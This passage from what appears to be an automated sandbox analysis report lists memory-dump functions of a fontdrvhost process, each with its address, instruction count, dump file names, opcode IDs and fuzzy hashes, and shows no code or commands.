                                                                    • Instruction Fuzzy Hash: 2C017C7190E3C99FDB539FB489606D83FB0BF13250F4A01EBE494CB0A3DA695A19C752
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA1159F Relevance: .0, Instructions: 41COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3750f98b5c0c7e730ff496b1ffe6793dff22d2e8a178991ca7e0eac30b64eb47
                                                                    • Instruction ID: 002a6d5caa19f80ed696eb127083028ddd1de0a55e32ea118b9ab8281a2f6bdd
                                                                    • Opcode Fuzzy Hash: 3750f98b5c0c7e730ff496b1ffe6793dff22d2e8a178991ca7e0eac30b64eb47
                                                                    • Instruction Fuzzy Hash: C801C030D0834D8FEB94DF95C8585FD7BB1EF16300F14426EC465972A6EA74A906CF40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC3E72 Relevance: .0, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d67b2f1eeaf81dbd705663f8a2f0bdbe20858f4ddb986e08e0dd165ffe405ef0
                                                                    • Instruction ID: 132545edcfb1f624dae64cc1adf4ecb00b876bdbf0256ac2c133c5303a9aa4a0
                                                                    • Opcode Fuzzy Hash: d67b2f1eeaf81dbd705663f8a2f0bdbe20858f4ddb986e08e0dd165ffe405ef0
                                                                    • Instruction Fuzzy Hash: FBF0A43194F2CA9FD712DBB488224E93FA0BF03208B0901F6D055CB0E2D63D5606C761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C10F48C Relevance: .0, Instructions: 38COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C10A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C10A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c10a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18c755660ea09ef0892844bb1c6037b26f14b3ee581cd8b78485d905c358487
                                                                    • Instruction ID: 5829b0c6f13e69b3d28cc00d5e299941299675fab4b0d66583e8884a12340a85
                                                                    • Opcode Fuzzy Hash: b18c755660ea09ef0892844bb1c6037b26f14b3ee581cd8b78485d905c358487
                                                                    • Instruction Fuzzy Hash: 1F017274909A1D8FDFA8DF58D8A4BA8B7B1FB68300F1041AED44EE3250CB715A85CF04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBDADBE Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7292212fd550abeec741d867532985dd15d728077d31692773424573d65185e1
                                                                    • Instruction ID: 41d02f3500dea65440f92f4aa81da53152d88d65afd72887c114ef33f7b9d644
                                                                    • Opcode Fuzzy Hash: 7292212fd550abeec741d867532985dd15d728077d31692773424573d65185e1
                                                                    • Instruction Fuzzy Hash: 4001FB70A0980DCFDF98DB88D4A1AACB7B1FF98305F110169D50EE32A0CA34AD02CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCA982 Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8cbc8c7b55717a26adf22884b5ea2563ac18986b6049f465fe127262cf9cdf0c
                                                                    • Instruction ID: 7ec9e5772e26dd545458c72f168cfa198fb450a080a19a00a784d2e234471260
                                                                    • Opcode Fuzzy Hash: 8cbc8c7b55717a26adf22884b5ea2563ac18986b6049f465fe127262cf9cdf0c
                                                                    • Instruction Fuzzy Hash: F3F0623554E38E9FD722EBF488625A57FB0FF42218B1600FAD099870A2D9AC5646C751
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DE8A2 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2089d86798772d0e0f5767dd311eb3f84676864da10ed3f98afc13d6316ee674
                                                                    • Instruction ID: bfa1bc8a08255df0a37c7a86c0ec159f235f294442a6ce2c8a3f78df9ee3ac2c
                                                                    • Opcode Fuzzy Hash: 2089d86798772d0e0f5767dd311eb3f84676864da10ed3f98afc13d6316ee674
                                                                    • Instruction Fuzzy Hash: A1F0623144E3C69FD3229BB088654957FB4AF43284F1901F6F45DCB0A2D66D1646D761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C111EB7 Relevance: .0, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C10A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C10A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c10a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f08ce8a8fd46b3462380c584dc401a9a2c0727f84cd5fbc316262311f53f0de4
                                                                    • Instruction ID: d1cb18c7bfaf58c2a95627cb9abf62602da7a09a50fe35ed8b289f583022ca54
                                                                    • Opcode Fuzzy Hash: f08ce8a8fd46b3462380c584dc401a9a2c0727f84cd5fbc316262311f53f0de4
                                                                    • Instruction Fuzzy Hash: 76011D71A0890E8FDFA8EF58C4A1EA8B7B1FB58700F6401A9940DD3296DE256941CF00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC5658 Relevance: .0, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abbbbd1c44672962c78255b410a3d530738a6c9766e757aa353e1819b82e20c2
                                                                    • Instruction ID: b78f4452f20f061a0b743dfd5256cc45285fb5bbbb6214770694d4b3d7263982
                                                                    • Opcode Fuzzy Hash: abbbbd1c44672962c78255b410a3d530738a6c9766e757aa353e1819b82e20c2
                                                                    • Instruction Fuzzy Hash: E8F05E21F1F80BCEE735BAE8D5331B93254BF51349F26163AC40E825E5CE29A601C295
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DA8D8 Relevance: .0, Instructions: 32COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c9d7b7b7baa67fdd210bdb5c7512846ce152402782fcb838d1f046aa0e69d409
                                                                    • Instruction ID: c10d3388a45b98018428266fa56fb31dc0096f0404ee98fa04c0c4129ece5757
                                                                    • Opcode Fuzzy Hash: c9d7b7b7baa67fdd210bdb5c7512846ce152402782fcb838d1f046aa0e69d409
                                                                    • Instruction Fuzzy Hash: F9F09A21F0D703CAE6342A9491211B93668BF41390F20477AF80E82081EB2A2A82B391
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBC4B6A Relevance: .0, Instructions: 31COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9d3c43d05e10b216f57c7ffd73ed9dd5d7b58d1f7a12ed5e1f957604a64a504a
                                                                    • Instruction ID: fbdc098c093c6c81b4d40d070a47791cb398cbf6a4947038b1bc9ba9dd441524
                                                                    • Opcode Fuzzy Hash: 9d3c43d05e10b216f57c7ffd73ed9dd5d7b58d1f7a12ed5e1f957604a64a504a
                                                                    • Instruction Fuzzy Hash: AAF09611A0E7C64FEB32EBA88CA11A83FA0AF2731470906FEC4548B1E7D5586605C711
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C11565D Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C10A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C10A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c10a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9f5241f0d7e51fb3ecd75855d64fb9e39ef5d93b20e88e902c9cf85c24e615d1
                                                                    • Instruction ID: ca99b66d64564c186efca5de8617d5b291bd107424d5b54fc7465146d7602a85
                                                                    • Opcode Fuzzy Hash: 9f5241f0d7e51fb3ecd75855d64fb9e39ef5d93b20e88e902c9cf85c24e615d1
                                                                    • Instruction Fuzzy Hash: 8BF0C970A1452D8EDBA8DB18D8A9BA9B7B1FF58340F4001EAD00EE3291CB345EC0CF14
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA114B9 Relevance: .0, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfa1dcafff2f0d16f4cf50fd4296eb32325cf09fc6c0d0a9c7ea0180b71b0917
                                                                    • Instruction ID: 352ac8a934bd9d02af0bb508dd79e451c0675f4b33717d597a66cac542b4e253
                                                                    • Opcode Fuzzy Hash: cfa1dcafff2f0d16f4cf50fd4296eb32325cf09fc6c0d0a9c7ea0180b71b0917
                                                                    • Instruction Fuzzy Hash: 51F01274D0E21D8EEBB0DBF984542FCBAF4AF15301F311579D04A972A3D67896448F00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA159FB Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c94ff077919e1b6ca1bc7d07f6fe32b3757a01b756d23c7a8e0ccbd91490d8b
                                                                    • Instruction ID: a69b7a7db8d0877be3205c32334022684f9c925a68bba4ce29df7df31c520321
                                                                    • Opcode Fuzzy Hash: 2c94ff077919e1b6ca1bc7d07f6fe32b3757a01b756d23c7a8e0ccbd91490d8b
                                                                    • Instruction Fuzzy Hash: CCE06571F1D60D4FEBA4DB98C8756E973A1FF49390F0100B5D44D862A3CD7829418F50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D7635 Relevance: .0, Instructions: 22COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 25412e8a99d30e0f632988ef88b82f8f3fa1083cd54197db5ade967f506e7e87
                                                                    • Instruction ID: b3f9949a69987fb322e98eb811675a2b2da37d9da5e26a438a6d1b20371dbafe
                                                                    • Opcode Fuzzy Hash: 25412e8a99d30e0f632988ef88b82f8f3fa1083cd54197db5ade967f506e7e87
                                                                    • Instruction Fuzzy Hash: 2CE09A3181D38A8BD7619B6888B64EC7B30AF00340F5802EAF90C46186FB246618A642
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10A34 Relevance: .0, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2132802424.00007FFD9BA0B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA0B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9ba0b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b2bdc7dbd27650ee1cb098e98e88ec44e539eed319958bf6e2aafd089001f027
                                                                    • Instruction ID: 45512acd38665a31914aaa32d5c6eb330fd2749c4250cbe7ab6938b015ac4044
                                                                    • Opcode Fuzzy Hash: b2bdc7dbd27650ee1cb098e98e88ec44e539eed319958bf6e2aafd089001f027
                                                                    • Instruction Fuzzy Hash: A4E08631E2D51E5BEB64EB94C4A1AFD7BF1EF58700F000074E459D2296CE241801CB44
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCB677 Relevance: .0, Instructions: 19COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d5715c2bb83859ccf609475ee23f2adf93acf642489715001ddcf8cd6ee0eaf4
                                                                    • Instruction ID: d705ea9a103927849f41223eb74383ffa2cd7f26ea0a092ab1b4304c58a687c9
                                                                    • Opcode Fuzzy Hash: d5715c2bb83859ccf609475ee23f2adf93acf642489715001ddcf8cd6ee0eaf4
                                                                    • Instruction Fuzzy Hash: F1E0CD51F0E28E4FEB3259BC087507C7A50BF073497060476C0468A2E3D6187A00D351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BBCC14B Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2167161953.00007FFD9BBC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9bbc0000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 77e666d87c23b052df9773a38144d315bb66978496623f7bf458dcce7a6f9f46
                                                                    • Instruction ID: 281c90b4a568db165a2925b648c372f3f78b7318e637d21b944aeac82b3c1034
                                                                    • Opcode Fuzzy Hash: 77e666d87c23b052df9773a38144d315bb66978496623f7bf458dcce7a6f9f46
                                                                    • Instruction Fuzzy Hash: 36D0C914B0F64F85F579F68BD17123E11A0BF61B08E22203DC0AF419E1CD2C7B01E282
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0E007B Relevance: .0, Instructions: 11COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
                                                                    • Instruction ID: 772f2b5b4db609da05f7a654c7c1a6d3301722f322ec350f3c66d27d05a4f289
                                                                    • Opcode Fuzzy Hash: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
                                                                    • Instruction Fuzzy Hash: B0D0C924B8D64385F57946D1403033911B19F807C8FE0803ED19F438C2CF1D78617211
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0DF5B1 Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 96b7144aeae261a5894ba86647e5001a32520c02589473d02b30324ea2e3f6f3
                                                                    • Instruction ID: 03dbe830a12e1d898b17f23f5777703c4d3227fe0e73645de604c81dcf5d2878
                                                                    • Opcode Fuzzy Hash: 96b7144aeae261a5894ba86647e5001a32520c02589473d02b30324ea2e3f6f3
                                                                    • Instruction Fuzzy Hash: 96B00205F5C30356F53454E4086517D01A14B45685E544735B61F852C6FE58294132A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9C0D9E21 Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2349986334.00007FFD9C0D5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C0D5000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_7ffd9c0d5000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fbf784f9980aa1569ffb50952dab95f624257e657ee0d49720e34f175724abea
                                                                    • Instruction ID: a35864ff57ff0fc3e3782652ba253b545fd163d09b02942f43a2b14c69919d49
                                                                    • Opcode Fuzzy Hash: fbf784f9980aa1569ffb50952dab95f624257e657ee0d49720e34f175724abea
                                                                    • Instruction Fuzzy Hash: 84B00940F1C32396E63411F858A917D14A62B492C6EA41B75BA0F8A2D2FE992940B6A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%